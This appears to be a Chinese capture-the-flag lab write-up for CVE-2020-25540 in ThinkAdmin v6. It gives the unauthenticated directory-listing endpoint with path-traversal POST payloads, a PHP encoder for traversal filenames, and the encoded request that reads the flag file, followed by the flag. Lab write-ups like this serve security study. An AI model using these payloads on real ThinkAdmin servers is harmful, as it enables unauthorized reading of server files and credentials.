春秋云镜 CVE-2020-25540

isbug02023-08-07 18:27

春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞

靶标介绍

ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

启动场景

漏洞利用

1、未授权列目录poc

读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node

POST:

rules=["/"]

rules=[".../.../.../"] (目录穿越)

2、任意文件读取

使用加密函数对文件名进行加密

php 复制代码 
<?php
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content="../../../flag";
echo encode($content);
?>

加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v

请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v

base64解密得到文件内容

得到flag

flag{cef71ab7-c930-408d-8074-52350766063b}

相关推荐
IT研究所6 小时前
IT 资产管理 (ITAM) 与 ITSM 协同实践:构建从资产到服务的闭环管理体系
大数据·运维·人工智能·科技·安全·低代码·自动化
诸葛务农12 小时前
iPhone Face ID的安全隔离区和神经网络引擎及其用于人形机器人的实践(下)
神经网络·安全·iphone
开开心心就好12 小时前
免费轻量电子书阅读器,多系统记笔记听书
linux·运维·服务器·安全·ddos·可信计算技术·1024程序员节
龙亘川13 小时前
城管住建领域丨市政设施监测功能详解(2)——桥梁设施监测:筑牢桥梁结构安全防线
安全·城管住建领域·桥梁设施
菩提小狗14 小时前
第15天:信息打点-主机架构&蜜罐识别&WAF识别&端口扫描&协议识别&服务安全_笔记|小迪安全2023-2024|web安全|渗透测试|
笔记·安全·架构
coding随想15 小时前
揭秘V8引擎的类型混淆漏洞:安全开发的警示与启示
网络·安全
程序边界15 小时前
数据库MySQL兼容版权限隔离深度体验:从兼容到安全增强的实战之路
数据库·mysql·安全
武汉庞小锋15 小时前
微信模板消息不稳定问题
安全·信息与通信
Chockmans16 小时前
春秋云境CVE-2020-19957
web安全·网络安全·春秋云境·cve-2020-19957
诸葛务农18 小时前
iPhone Face ID的安全隔离区和神经网络引擎及其用于人形机器人的实践(上)
神经网络·安全·iphone
热门推荐
01GitHub 镜像站点02从零搭建一个 PHP 登录注册系统(含完整源码)03AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot04MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06使用 1panel面板 部署 php网站07openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南08如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解09配置 OpenClaw 使用 Ollama 本地模型10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)